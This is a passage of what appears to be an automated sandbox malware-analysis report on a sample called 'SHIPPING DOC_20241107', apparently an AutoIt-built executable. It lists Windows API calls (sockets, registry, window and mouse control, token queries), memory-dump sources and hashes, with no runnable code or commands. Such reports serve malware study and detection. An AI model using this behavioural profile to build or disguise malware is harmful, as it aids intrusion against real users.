                                                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00A2632D
                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00A26337
                                                                                                                              • closesocket.WSOCK32(00000000), ref: 00A26360
                                                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A26379
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 910771015-0
                                                                                                                              • Opcode ID: 22086366485a374caaf50823fcfdf76061c1ea0ecbc15b95e0980659be258d0e
                                                                                                                              • Instruction ID: bebc157966b69cc22d4db30c66c472d25b0099a34e0df41bcb77219356873b06
                                                                                                                              • Opcode Fuzzy Hash: 22086366485a374caaf50823fcfdf76061c1ea0ecbc15b95e0980659be258d0e
                                                                                                                              • Instruction Fuzzy Hash: 0131C231610228AFDB10DF68DD85BFE7BB9EB45720F044039FA05AB291DB70AD058BA1
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wcsnicmp
                                                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                              • API String ID: 1038674560-2734436370
                                                                                                                              • Opcode ID: 9034729d9b9ce30019af2a362b40bbea31225fa255102820b06feb2b0aa85ddd
                                                                                                                              • Instruction ID: 0788608be7281cd4c2ac9a55f703b6ec481dd3cc044ae4b4eac05a5da30b13b2
                                                                                                                              • Opcode Fuzzy Hash: 9034729d9b9ce30019af2a362b40bbea31225fa255102820b06feb2b0aa85ddd
                                                                                                                              • Instruction Fuzzy Hash: 66216E322481157ED230EB24AC12FB7B3A8EFD1390F508436F886A75C1E7905D42C395
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A3B1C6
                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,00A20FA5,00000000,?,00000000), ref: 00A3B1EB
                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,00A20FA5,00000000,?,00000000), ref: 00A3B203
                                                                                                                              • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,00A20FA5,00000000,?,00000000), ref: 00A3B22C
                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 00A3B24A
                                                                                                                              Strings
                                                                                                                              • aaafb3ddcdd68635e8c689174e1e7ffc02ea14c54fb4a848c83119c8d9105769f556a0427ec5bf9d609f7afb1e1b4c10e28c7c0f396f7cb422965561e84f190f09, xrefs: 00A3B1CF, 00A3B217
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                              • String ID: aaafb3ddcdd68635e8c689174e1e7ffc02ea14c54fb4a848c83119c8d9105769f556a0427ec5bf9d609f7afb1e1b4c10e28c7c0f396f7cb422965561e84f190f09
                                                                                                                              • API String ID: 2294984445-680645975
                                                                                                                              • Opcode ID: c5b5bfcd83f744f511d9012431392d245db53053d3081d3161516c00357e32a4
                                                                                                                              • Instruction ID: 17a7b9f6a568333914b0c63d7c60d6c4b52f18e886baac146190bd5597596a24
                                                                                                                              • Opcode Fuzzy Hash: c5b5bfcd83f744f511d9012431392d245db53053d3081d3161516c00357e32a4
                                                                                                                              • Instruction Fuzzy Hash: 64217171A34615AFCB10DFB98C08BAA77A5EB45721F104739FA36D61E0E7309851DBA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B1D35: CreateWindowExW.USER32 ref: 009B1D73
                                                                                                                                • Part of subcall function 009B1D35: GetStockObject.GDI32(00000011), ref: 009B1D87
                                                                                                                                • Part of subcall function 009B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 009B1D91
                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A37664
                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A37671
                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A3767C
                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A3768B
                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A37697
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                              • Opcode ID: f35011ee6242f87547545240850a8617f7d530ff0756e0a3e3c08ce6d9339079
                                                                                                                              • Instruction ID: d91abb5ff47bf63b374acaeec2b51cc7814b96a1f64655bd17a291c9581fe8d0
                                                                                                                              • Opcode Fuzzy Hash: f35011ee6242f87547545240850a8617f7d530ff0756e0a3e3c08ce6d9339079
                                                                                                                              • Instruction Fuzzy Hash: 6111B6B1510219BFEF159F64DC86EEB7F6DEF08758F014115B604A6090C7719C21DBA0
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009D41D2,?), ref: 009D4123
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009D412A
                                                                                                                              • EncodePointer.KERNEL32(00000000), ref: 009D4136
                                                                                                                              • DecodePointer.KERNEL32(00000001,009D41D2,?), ref: 009D4153
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                              • String ID: RoInitialize$combase.dll
                                                                                                                              • API String ID: 3489934621-340411864
                                                                                                                              • Opcode ID: 2848b03031b66e3ca325894693780f28c23dbf3017239f69d32a8500bc2fe260
                                                                                                                              • Instruction ID: 0e98fb883ff5d0e0f20135e50a3bb54026c12ad01f5a215a8a703247defd93e7
                                                                                                                              • Opcode Fuzzy Hash: 2848b03031b66e3ca325894693780f28c23dbf3017239f69d32a8500bc2fe260
                                                                                                                              • Instruction Fuzzy Hash: 5EE01A75BB0300AFEF10DBF0EC4DB043AA8B756B02F90C925B515DA1A0CBB54186EF00
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009D40F8), ref: 009D41F8
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009D41FF
                                                                                                                              • EncodePointer.KERNEL32(00000000), ref: 009D420A
                                                                                                                              • DecodePointer.KERNEL32(009D40F8), ref: 009D4225
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                                                              • API String ID: 3489934621-2819208100
                                                                                                                              • Opcode ID: 33ac8be7efa3bde89bf66bf3482101162bd4bd2c7aa950620629ea3fe2a22698
                                                                                                                              • Instruction ID: 336a992a712397a2a33ccb8e3c953e328fd1f1a7d8b79e943c5b7acaddf4d690
                                                                                                                              • Opcode Fuzzy Hash: 33ac8be7efa3bde89bf66bf3482101162bd4bd2c7aa950620629ea3fe2a22698
                                                                                                                              • Instruction Fuzzy Hash: C9E09A75AD1200AFEE50DBE1EC4DB4537A4BB04743F518525F125D51A0CB7646469B11
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3253778849-0
                                                                                                                              • Opcode ID: 3800217ce0e639a5d74129e119ddcf674f147e2b6c8c6efa8e8df399abad943c
                                                                                                                              • Instruction ID: 5bbbb016d05af7670522d749bb6ac6c39e0a3a763e49cbff1600d6ac41e08746
                                                                                                                              • Opcode Fuzzy Hash: 3800217ce0e639a5d74129e119ddcf674f147e2b6c8c6efa8e8df399abad943c
                                                                                                                              • Instruction Fuzzy Hash: B261DF3050025A9BCF11EF68CD86FFE77B9AF84318F048559F959AB292DB34AD41CB50
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A30EA5: CharUpperBuffW.USER32(?,?), ref: 00A30EBC
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A30348
                                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A30388
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A303AB
                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A303D4
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A30417
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A30424
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4046560759-0
                                                                                                                              • Opcode ID: a505294a8fde21af2de05ae72a030ea898ef220c242a09a02634d03154d3f2f8
                                                                                                                              • Instruction ID: 4fd0253f24a2761d33441a7a8ad396474f72125a11dd3965e1632c76525f3eaf
                                                                                                                              • Opcode Fuzzy Hash: a505294a8fde21af2de05ae72a030ea898ef220c242a09a02634d03154d3f2f8
                                                                                                                              • Instruction Fuzzy Hash: E1515931208200AFC714EF68D995EAFBBE9FF89314F04891DF5859B2A1DB31E905CB52
                                                                                                                              APIs
                                                                                                                              • GetMenu.USER32(?,00000001,00000000), ref: 00A35864
                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00A3589B
                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A358C3
                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00A35932
                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00A35940
                                                                                                                              • PostMessageW.USER32 ref: 00A35991
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 650687236-0
                                                                                                                              • Opcode ID: e73737cabe0e5f2377596ac0235f7a012f5d5a07c035b3f0cac9496746235f30
                                                                                                                              • Instruction ID: b3be251ffcd52b8649ad0b3d5e00c97943c3461bac045b9da4392aba4909150e
                                                                                                                              • Opcode Fuzzy Hash: e73737cabe0e5f2377596ac0235f7a012f5d5a07c035b3f0cac9496746235f30
                                                                                                                              • Instruction Fuzzy Hash: 96515C31E00615EFCF11DFA8C945AAEB7B5EF88720F108469F955BB351CB70AE418B90
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A0F218
                                                                                                                              • VariantClear.OLEAUT32(00000013), ref: 00A0F28A
                                                                                                                              • VariantClear.OLEAUT32(00000000), ref: 00A0F2E5
                                                                                                                              • _memmove.LIBCMT ref: 00A0F30F
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A0F35C
                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A0F38A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1101466143-0
                                                                                                                              • Opcode ID: 48a2d987713947b453772773220f4d071ff37db0b48c7188b8ddecf179ca182c
                                                                                                                              • Instruction ID: 2d197454fcf04327eaa9f08429f4b5ceae63f1a517f071ff2f5582e589a609ac
                                                                                                                              • Opcode Fuzzy Hash: 48a2d987713947b453772773220f4d071ff37db0b48c7188b8ddecf179ca182c
                                                                                                                              • Instruction Fuzzy Hash: DB512CB5A00209DFDB24CF58D884AAAB7B8FF4C314B158569F959EB341D730E951CFA0
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00A12550
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A1259B
                                                                                                                              • IsMenu.USER32(00000000), ref: 00A125BB
                                                                                                                              • CreatePopupMenu.USER32 ref: 00A125EF
                                                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00A1264D
                                                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A1267E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3311875123-0
                                                                                                                              • Opcode ID: d425564743f48b54904d3f8b8e6dfc1eafedfded423f0373498b50fd89e18dbe
                                                                                                                              • Instruction ID: 6618e324bb6091d76ea596f3bc95ff850d62e1b2c232575bbf024118862c090c
                                                                                                                              • Opcode Fuzzy Hash: d425564743f48b54904d3f8b8e6dfc1eafedfded423f0373498b50fd89e18dbe
                                                                                                                              • Instruction Fuzzy Hash: FE517B70A002499FCF20CF68D988BEEBBF6EF54314F144169E8659B2D0E770D9A4CB51
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B2612: GetWindowLongW.USER32(?,000000EB), ref: 009B2623
                                                                                                                              • BeginPaint.USER32(?,?), ref: 009B179A
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 009B17FE
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 009B181B
                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009B182C
                                                                                                                              • EndPaint.USER32(?,?), ref: 009B1876
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1827037458-0
                                                                                                                              • Opcode ID: 9607110549652c0b020a67b8ab90d14640dc5ad4e135f2f7b09484144aeb9691
                                                                                                                              • Instruction ID: 135b2b73461aba047b0e683114ced50e8c26a727ca1d7942199e6f8abcda21c5
                                                                                                                              • Opcode Fuzzy Hash: 9607110549652c0b020a67b8ab90d14640dc5ad4e135f2f7b09484144aeb9691
                                                                                                                              • Instruction Fuzzy Hash: 7541AE30900640AFD711DF65DC94FBA7BE8FB45734F144629FAA88B1B2C7709846DB62
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(00A757B0,00000000), ref: 00A3B746
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00A3B76A
                                                                                                                              • ShowWindow.USER32(00A757B0,00000000), ref: 00A3B7CA
                                                                                                                              • ShowWindow.USER32(00000000,00000004), ref: 00A3B7DC
                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00A3B800
                                                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A3B823
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 642888154-0
                                                                                                                              • Opcode ID: d34beae4248c7dc71624c115248db693018399193f37200c3f840cb755c98876
                                                                                                                              • Instruction ID: eb4f36f0dccffff93a1a104f63fc87841634cde9453153424a15c17289bff578
                                                                                                                              • Opcode Fuzzy Hash: d34beae4248c7dc71624c115248db693018399193f37200c3f840cb755c98876
                                                                                                                              • Instruction Fuzzy Hash: 2C417434611144EFDB21CF64C88ABA47BE6FF45314F1841B9FA498F2A2C731E846CB61
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 00A271C1
                                                                                                                                • Part of subcall function 00A23AB6: GetWindowRect.USER32(?,?), ref: 00A23AC9
                                                                                                                              • GetDesktopWindow.USER32 ref: 00A271EB
                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00A271F2
                                                                                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A27224
                                                                                                                                • Part of subcall function 00A152EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A15363
                                                                                                                              • GetCursorPos.USER32(?), ref: 00A27250
                                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A272AE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4137160315-0
                                                                                                                              • Opcode ID: d876477d581523b38018e6248ddcfd4ead7692b59e92189fb0ab88423471d93e
                                                                                                                              • Instruction ID: b64f718a4ffd554487b032e728e40985b0ac6e3a78f2f0650bf6e6f449f4e8a7
                                                                                                                              • Opcode Fuzzy Hash: d876477d581523b38018e6248ddcfd4ead7692b59e92189fb0ab88423471d93e
                                                                                                                              • Instruction Fuzzy Hash: 7B31A172509315AFD720DF58DC49E9BB7A9FB88314F000929F985A7191DB30EA098B92
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A083D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A083E8
                                                                                                                                • Part of subcall function 00A083D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A083F2
                                                                                                                                • Part of subcall function 00A083D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A08401
                                                                                                                                • Part of subcall function 00A083D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A08408
